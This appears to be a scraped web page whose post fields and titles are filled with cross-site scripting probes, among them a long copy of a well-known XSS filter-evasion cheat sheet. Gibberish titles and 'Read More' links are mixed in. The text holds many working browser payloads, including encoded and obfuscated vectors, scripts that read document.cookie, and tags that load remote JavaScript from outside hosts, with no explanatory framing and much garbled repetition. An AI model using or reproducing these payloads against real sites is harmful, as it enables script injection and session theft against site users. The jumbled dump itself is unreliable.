javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); '`">javascript:alert(1) '`">javascript:alert(1) \x3Cscript>javascript:alert(1) '"`>/* *\x2Fjavascript:alert(1)// */ javascript:alert(1)</script\x0D javascript:alert(1)</script\x0A javascript:alert(1)</script\x0B javascript:alert(1) <!--\x3E --> --> --> --> --> --> `"'> test "'`>

a='hello\x27;javascript:alert(1)//';

test test Read More →

qwygeqwhenqw

document.getElementsByTagName(“body”).innerHTML = ‘‘;

document.getElementsByTagName("body").innerHTML = ''; Read More →

412123wqe

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:”,message:’alert\x281\x29′}

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x281\x29'} Read More →

lfdgdsfsd

alert(123); alert(“XSS”); alert(123) alert(“hellox worldss”); alert(“XSS”) alert(“XSS”); alert(‘XSS’) “>alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1) {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /*%00*/alert(1)/*%00*/</script /*%00*/ ">%00 <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) alert(“XSS”)”> <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") “>’>alert(String.fromCharCode(88,83,83)) ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> <alert(“XSS”);//< “>’>alert(String.fromCharCode(88,83,83)) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search alert(“hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert(“XSS”);&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search hellox worldss … lol <!– <img src=" alert(1)”> alert(1)”> alert(1)”> alert(1)’>”> alert(1)”> alert(123)”> LOL LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) LOLalert(123) <SCRIPT>alert(/XSS/.source)</SCRIPT> \\”;alert(‘XSS’);// </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT> <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”> <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=\”javascript:alert(‘XSS’)\”> <IMG LOWSRC=\”javascript:alert(‘XSS’)\”> <BGSOUND SRC=\”javascript:alert(‘XSS’);\”> <BR SIZE=\”\”> <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER> <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”> <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”> <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”> <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE> <XSS STYLE=\”behavior: url(xss.htc);\”> <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(\”XSS\”)’> <IMG SRC=\”mocha:[code]\”> <IMG SRC=\”livescript:[code]\”> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\” <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME> <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET> <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”> <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”width: expression(alert(‘XSS’));\”> <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)';</STYLE> <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”> <XSS STYLE=\”xss:expression(alert(‘XSS’))\”> exp/*<A STYLE=’no\xss:noxss(\”*//*\”); xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’> <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE> <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A> <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE> <!–[if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif]–> <BASE HREF=\”javascript:alert(‘XSS’);//\”> <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT> <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED> <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED> a=\”get\”; b=\”URL(\\”\”; c=\”javascript:\”; d=\”alert(‘XSS’);\\”)\”; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\”xss\”><I><B><IMG SRC=\”javas<!– –>cript:alert(‘XSS’)\”></B></I></XML> <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN> <XML SRC=\”xsstest.xml\” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”> <?import namespace=\”t\” implementation=\”#default#time2\”> <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”> </BODY></HTML> <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT> <!–#exec cmd=\”/bin/echo ‘<SCR’\”–><!–#exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\”–> <? echo(‘<SCR)'; echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?> <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”> <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>\” ” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <A HREF=\”http://66.102.7.147/\”>XSS</A> <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A> <A HREF=\”http://1113982867/\”>XSS</A> <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A> <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A> <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A> <A HREF=\”//www.google.com/\”>XSS</A> <A HREF=\”//google\”>XSS</A> <A HREF=\”http://ha.ckers.org@google\”>XSS</A> <A HREF=\”http://google:ha.ckers.org\”>XSS</A> <A HREF=\”http://google.com/\”>XSS</A> <A HREF=\”http://www.google.com./\”>XSS</A> <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A> <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < < &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c < < < < < < &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < < &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < < \x3c \x3C \u003c \u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\”javascript:alert(‘XSS’)\” <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\”XSS\”);//<</SCRIPT> <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)> <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <IMG SRC=\” javascript:alert(‘XSS’);\”> perl -e ‘print \”<SCRIPT>alert(\\”XSS\\”)</SCRIPT>\”;’ > out perl -e ‘print \”<IMG SRC=javascript:alert(\\”XSS\\”)>\”;’ > out <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”> <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=\”javascript:alert(‘XSS’);\”> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ”;!–\”<XSS>=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= alert(“XSS”)”> <alert(“XSS”);//< a=/XSS/alert(a.source) \”;alert(‘XSS’);// alert(“XSS”); ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e); document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> TESTHTML5FORMACTION crosssitespt <!– <img src=" alert(1)”> alert(1)”> alert(1)”> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)() {alert(1)};1 crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’) alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))

alert(123); alert("XSS"); alert(123) alert("hellox worldss"); alert(“XSS”) alert(“XSS”); alert(‘XSS’) “>alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1) {font-family&colon;'' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /*%00*/alert(1)/*%00*/</script /*%00*/ ">

%00 <iframe/src="data:text/html,"> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00;